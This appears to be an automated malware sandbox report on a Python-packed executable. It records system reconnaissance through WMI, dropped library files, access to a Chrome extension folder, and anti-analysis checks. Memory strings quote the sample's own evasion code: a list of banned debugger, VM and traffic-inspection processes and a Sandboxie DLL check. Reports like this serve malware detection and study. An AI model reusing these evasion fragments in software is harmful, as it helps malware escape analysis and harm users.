            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
            Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Description, ProviderName FROM Win32_LogicalDisk
            Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Command FROM Win32_StartupCommand
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: rename_me_before.exe, 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: QEMU-GA.EXE
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "QEMU-GA.EXE"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "PROCESSHACKER.EXE"0A!
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMUSRVC.EXEPF!
            Source: rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELF.BANNED_PROCESS = ["HTTP TOOLKIT.EXE", "HTTPDEBUGGERUI.EXE","WIRESHARK.EXE", "FIDDLER.EXE", "REGEDIT.EXE", "TASKMGR.EXE", "VBOXSERVICE.EXE", "DF5SERV.EXE", "PROCESSHACKER.EXE", "VBOXTRAY.EXE", "VMTOOLSD.EXE", "VMWARETRAY.EXE", "IDA64.EXE", "OLLYDBG.EXE",
            Source: rename_me_before.exe, 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _PROCESS = ["HTTP TOOLKIT.EXE", "HTTPDEBUGGERUI.EXE","WIRESHARK.EXE", "FIDDLER.EXE", "REGEDIT.EXE", "TASKMGR.EXE", "VBOXSERVICE.EXE", "DF5SERV.EXE", "PROCESSHACKER.EXE", "VBOXTRAY.EXE", "VMTOOLSD.EXE", "VMWARETRAY.EXE", "IDA64.EXE", "OLLYDBG.EXE",
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "SBIEDLL.DLL"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "VMUSRVC.EXE"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "XENSERVICE.EXE"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: XENSERVICE.EXE0G!
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "VMUSRVC.EXE"0
            Source: rename_me_before.exe, 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "XENSERVICE.EXE", # XEN
            Source: rename_me_before.exe, 00000001.00000003.1948127865.000001B1028B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "HTTPDEBUGGERUI.EXE","WIRESHARK.EXE", "
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE0
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMUSRVC.EXE
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "XENSERVICE.EXE"PN!
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "WIRESHARK.EXE"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "PROCESSHACKER.EXE"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL0Z!
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "XENSERVICE.EXE"PV!
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "OLLYDBG.EXE"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "FIDDLER.EXE"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: XENSERVICE.EXE
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "SBIEDLL.DLL"0
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
            Source: rename_me_before.exe, 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HANDLE = CTYPES.WINDLL.LOADLIBRARY("SBIEDLL.DLL")
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2622
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 573
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3589
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3101
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\frozenlist\_frozenlist.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_uuid.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_bz2.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_websocket.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_socket.pydJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.dllJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_queue.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_overlapped.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\pyexpat.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_cffi_backend.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_http_parser.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\python3.dllJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_lzma.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\unicodedata.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_helpers.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_hashlib.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\python311.dllJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\multidict\_multidict.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography\hazmat\bindings\_rust.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\select.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_ssl.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_http_writer.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\yarl\_quoting_c.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_decimal.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_sqlite3.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_asyncio.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_ctypes.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17045
            Source: C:\Users\user\Desktop\rename_me_before.exeAPI coverage: 7.8 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7416Thread sleep count: 2622 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7420Thread sleep count: 573 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7596Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 7648Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380Thread sleep count: 3589 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380Thread sleep count: 3101 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7316Thread sleep time: -8301034833169293s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404E79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6404E79B0
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404E85A0 FindFirstFileExW,FindClose,0_2_00007FF6404E85A0
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF640500B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF640500B84
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404E85A0 FindFirstFileExW,FindClose,1_2_00007FF6404E85A0
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404E79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF6404E79B0
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF640500B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF640500B84
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\imagesJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_localesJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\cssJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\htmlJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bgJump to behavior
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmwareuser.exe"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware
            Source: rename_me_before.exe, 00000001.00000002.1979075425.000001B101E80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Hyper-V
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vboxservice.exe"0V!
            Source: rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vmwaretray.exe", # VMware
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc.exe
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc.exepW!
            Source: rename_me_before.exe, 00000001.00000003.1966603181.000001B103364000.00000004.00000020.00020000.00000000.sdmp, net1.exe, 00000030.00000002.1767121596.00000228A90E8000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.1.drBinary or memory string: *Hyper-V Administrators
            Source: rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vboxservice.exe", # VirtualBox
            Source: rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: self.banned_process = ["HTTP Toolkit.exe", "httpdebuggerui.exe","wireshark.exe", "fiddler.exe", "regedit.exe", "taskmgr.exe", "vboxservice.exe", "df5serv.exe", "processhacker.exe", "vboxtray.exe", "vmtoolsd.exe", "vmwaretray.exe", "ida64.exe", "ollydbg.exe",
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray.exepC!
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga.exe
            Source: rename_me_before.exe, 00000001.00000003.1891156202.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1947237648.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966603181.000001B103364000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977271486.000001B100CAC000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1969941981.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971439621.000001B100CAB000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1891031663.000001B101762000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1890887801.000001B10175B000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000003D.00000002.1787934637.000001EFE711A000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.1.drBinary or memory string: DISPLAY_NAME: Hyper-V Heartbeat Service
            Source: rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: elif b"vmware" in stdout2.lower():
            Source: rename_me_before.exe, 00000001.00000003.1966433527.000001B10039E000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1970636135.000001B1003A1000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1967629059.000001B10039F000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1972845949.000001B1003A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.2920698906.000001D218A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.2919335648.000001D21342B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vmsrvc.exe", # VirtualBox
            Source: rename_me_before.exe, 00000001.00000003.1966603181.000001B103364000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.1.drBinary or memory string: DISPLAY_NAME: Hyper-V Volume Shadow Copy Requestor
            Source: rename_me_before.exe, 00000001.00000003.1966603181.000001B103364000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1970864260.000001B10096C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1976544223.000001B10096C000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000003D.00000002.1787934637.000001EFE711A000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.1.drBinary or memory string: DISPLAY_NAME: Hyper-V Time Synchronization Service
            Source: rename_me_before.exe, 00000001.00000002.1980706775.000001B103351000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: E: vmicshutdown
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmwaretray.exe"0D!
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vboxtray.exe"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmwareuser.exe"pD!
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: b"vmware"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray.exepU!
